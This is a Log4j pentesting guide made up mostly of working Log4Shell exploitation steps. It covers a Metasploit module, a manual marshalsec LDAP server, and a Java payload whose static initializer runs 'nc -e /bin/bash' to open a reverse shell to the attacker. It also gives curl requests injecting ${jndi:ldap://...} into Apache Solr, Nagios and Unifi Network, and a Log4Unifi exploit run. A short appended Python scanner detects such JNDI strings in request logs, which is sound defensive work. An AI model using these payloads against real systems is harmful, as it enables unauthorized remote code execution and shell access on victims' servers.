# Log4j Pentesting

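Log4j is affected by the zero-day vulnerability Log4Shell, which can be exploited with Metasploit, with a manual JNDI/LDAP setup, or, against Unifi Network, with Log4Unifi.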

```shellscript
msfconsole
msf> use exploit/multi/http/log4shell_header_injection
msf> set HTTP_HEADER ACCEPT
msf> set RHOSTS <target-ip>
msf> set SRVHOST <local-ip>
msf> set SRVPORT 1389
# e.g. Nagios
msf> set TARGETURI /~logs
msf> set LHOST <local-ip>
msf> run
shell
```

### Exploit Apache Solr (JNDI)

You need four terminals on your local machine.

#### 1. Start LDAP Server on Your Local Terminal 1

1. **Install Maven**

   ```shellscript
   sudo apt install maven
   ```
2. **Get the Payload**

   Download the repository.

   ```shellscript
   git clone https://github.com/mbechler/marshalsec.git
   cd marshalsec
   ```

   Then build the marshalsec utility.

   ```shellscript
   mvn clean package -DskipTests
   ```
3. **Start LDAP Server**

   ```shellscript
   java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<your-local-ip>:8000/#Exploit"
   ```

#### 2. Host the Exploit on Your Local Terminal 2

1. **Create the Exploit with Java**

   First, create a new directory and, inside it, a new file named "Exploit.java".\
   Open it in your favorite editor, such as vim.

   ```shellscript
   mkdir exploit
   cd exploit
   vim Exploit.java
   ```

   In the editor, enter the following code.

   ```java
   public class Exploit {
       // Static initializer: runs as soon as the class is loaded
       static {
           try {
               java.lang.Runtime.getRuntime().exec("nc -e /bin/bash <your-local-ip> <your-local-listener-port>");
           } catch (Exception e) {
               e.printStackTrace();
           }
       }
   }
   ```
2. **Compile the Payload**

   ```shellscript
   javac Exploit.java -source 8 -target 8
   ```
3. **Start Web Server to Host the Payload**

   ```shellscript
   python3 -m http.server 8000
   ```

#### 3. Open Listener on Your Local Terminal 3

```shellscript
nc -lvnp <your-local-listener-port>
```

#### 4. Send Request to the Target Website

```shellscript
# Apache Solr
curl 'http://<target-ip>:<target-port>/solr/admin/cores?foo=${jndi:ldap://<local-ip>:1389/Exploit}'

# Nagios
curl http://<target-ip>:<target-port>/~logs -H 'Accept: ${jndi:ldap://<local-ip>:1389/Exploit}'
```

### Exploit Unifi Network using Log4Unifi

**Log4Unifi** is a tool for exploiting Log4j in **Unifi Network**.

#### 1. Test the Vulnerability in the Target Web Page

```shellscript
curl -i -s -k -X POST -H $'Host: vulnerable.com:8443' -H $'Content-Length: 104' --data-binary $'{\"username\":\"a\",\"password\":\"a\",\"remember\":\"${jndi:ldap://9ulral.dnslog.cn:1389/o=tomcat}\",\"strict\":true}' $'https://<target-ip>:8443/api/login'
```

#### 2. Open Listener on Your Local Machine

```shellscript
nc -lvnp 4444
```

#### 3. Exploit

Download the exploit from [the repository](https://github.com/puzzlepeaches/Log4jUnifi).

```shellscript
git clone https://github.com/puzzlepeaches/Log4jUnifi
cd Log4jUnifi
```

Run the exploit.

```shellscript
python exploit.py -u https://<target-ip>:8443 -i <your-local-ip> -p 4444
```
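
From the defender's side, every request on this page carries a `${jndi:ldap://...}` string in a field the application logs: a query parameter, the `Accept` header, or the `remember` field of the login JSON. The Python sketch below is an added example, not part of the original page or of any tool it names; the record layout, field names and sample addresses are constructed assumptions. It scans request records for that string and extracts the callback host and port so they can be checked against egress logs.

```python
import json
import re
from urllib.parse import unquote

# The lookup form used in this page's requests: ${jndi:<scheme>://<host>[:<port>][/<path>]}
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]+)(?::(?P<port>\d+))?(?P<path>/[^}\s]*)?\}",
    re.IGNORECASE,
)

def find_jndi(text):
    """Return (scheme, host, port) for each JNDI lookup string in one logged value."""
    decoded = unquote(unquote(text))  # catch %24%7Bjndi... and double-encoded forms
    return [(m["scheme"].lower(), m["host"], int(m["port"]) if m["port"] else None)
            for m in JNDI_RE.finditer(decoded)]

def request_fields(req):
    """Yield (location, value) for each client-controlled part of a request record."""
    yield "uri", req.get("uri", "")
    for name, value in req.get("headers", {}).items():
        yield f"header:{name}", value
    body = req.get("body", "")
    try:
        parsed = json.loads(body)
    except ValueError:
        parsed = None
    if isinstance(parsed, dict):  # JSON login body: check each field separately
        for key, value in parsed.items():
            yield f"body:{key}", str(value)
    elif body:
        yield "body", body

def scan(records):
    """Return (source IP, location, scheme, callback host, callback port) per hit."""
    return [(req["src"], where, *hit)
            for req in records
            for where, value in request_fields(req)
            for hit in find_jndi(value)]

# Constructed request records (documentation-range addresses), one per request shape above.
SAMPLE = [
    {"src": "203.0.113.7", "uri": "/solr/admin/cores?foo=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.9%3A1389%2FExploit%7D"},
    {"src": "203.0.113.7", "uri": "/~logs", "headers": {"Accept": "${jndi:ldap://198.51.100.9:1389/Exploit}"}},
    {"src": "203.0.113.8", "uri": "/api/login",
     "body": '{"username":"a","password":"a","remember":"${jndi:ldap://callback.example:1389/o=tomcat}","strict":true}'},
    {"src": "192.0.2.10", "uri": "/solr/admin/cores?action=STATUS", "headers": {"Accept": "*/*"}},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A hit only shows that the string reached the server; outbound connections from the application host to the extracted callback address indicate the lookup was actually evaluated.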
